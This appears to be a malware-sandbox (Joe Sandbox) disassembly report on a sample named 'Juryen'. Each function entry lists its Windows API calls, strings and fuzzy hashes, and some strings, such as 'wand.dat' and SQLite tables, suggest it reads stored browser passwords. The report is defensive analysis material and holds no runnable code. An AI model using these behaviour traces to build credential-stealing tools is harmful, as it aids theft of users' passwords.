                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                    • String ID: MS Sans Serif
                                                                    • API String ID: 210187428-168460110
                                                                    • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                    • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                    • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                    • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                    Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ClassName_wcsicmpmemset
                                                                    • String ID: edit
                                                                    • API String ID: 2747424523-2167791130
                                                                    • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                    • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                    • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                    • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                    Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                    • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                    • String ID: SHAutoComplete$shlwapi.dll
                                                                    • API String ID: 3150196962-1506664499
                                                                    • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                    • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                    • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                    • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                    Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                    • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                    • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                    • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                    • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memcmp
                                                                    • String ID:
                                                                    • API String ID: 3384217055-0
                                                                    • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                    • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                    • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                    • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                    Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$memcpy
                                                                    • String ID:
                                                                    • API String ID: 368790112-0
                                                                    • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                    • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                    • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                    • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                    Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                      • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                      • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                    • GetMenu.USER32(?), ref: 00410F8D
                                                                    • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                    • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                    • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                    • String ID:
                                                                    • API String ID: 1889144086-0
                                                                    • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                    • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                    • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                    • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                    Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                    • GetLastError.KERNEL32 ref: 0041810A
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                    • String ID:
                                                                    • API String ID: 1661045500-0
                                                                    • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                    • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                    • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                    • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                    Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                    • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                    Strings
                                                                    • virtual tables may not be altered, xrefs: 0042EBD2
                                                                    • Cannot add a column to a view, xrefs: 0042EBE8
                                                                    • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpymemset
                                                                    • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                    • API String ID: 1297977491-2063813899
                                                                    • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                    • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                    • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                    • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                    Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040560C
                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                      • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                    • String ID: *.*$dat$wand.dat
                                                                    • API String ID: 2618321458-1828844352
                                                                    • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                    • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                    • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                    • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                    Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                    • wcslen.MSVCRT ref: 00410C74
                                                                    • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                                                    • _wcsicmp.MSVCRT ref: 00410CCE
                                                                    • _wcsicmp.MSVCRT ref: 00410CDF
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                    • String ID:
                                                                    • API String ID: 1549203181-0
                                                                    • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                    • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                    • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                    • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                    Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00412057
                                                                      • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                                    • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                    • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                    • GetKeyState.USER32(00000010), ref: 0041210D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                    • String ID:
                                                                    • API String ID: 3550944819-0
                                                                    • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                    • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                    • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                    • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                    Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • free.MSVCRT ref: 0040F561
                                                                    • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                    • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$free
                                                                    • String ID: g4@
                                                                    • API String ID: 2888793982-2133833424
                                                                    • Opcode ID: f4c62748892297cca6d0161f710da18fe8111e273cfe50514a2a3d701446a6bb
                                                                    • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                    • Opcode Fuzzy Hash: f4c62748892297cca6d0161f710da18fe8111e273cfe50514a2a3d701446a6bb
                                                                    • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                    Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                    • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: @
                                                                    • API String ID: 3510742995-2766056989
                                                                    • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                    • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                    • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                    • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                    Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                    • memset.MSVCRT ref: 0040AF18
                                                                    • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@memcpymemset
                                                                    • String ID:
                                                                    • API String ID: 1865533344-0
                                                                    • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                    • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                    • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                    • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                    Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004144E7
                                                                      • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                      • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                    • memset.MSVCRT ref: 0041451A
                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                    • String ID:
                                                                    • API String ID: 1127616056-0
                                                                    • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                    • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                    • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                    • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                    Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                    • memset.MSVCRT ref: 0042FED3
                                                                    • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memset
                                                                    • String ID: sqlite_master
                                                                    • API String ID: 438689982-3163232059
                                                                    • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                    • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                    • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                    • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                    Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                    • wcscpy.MSVCRT ref: 00414DF3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
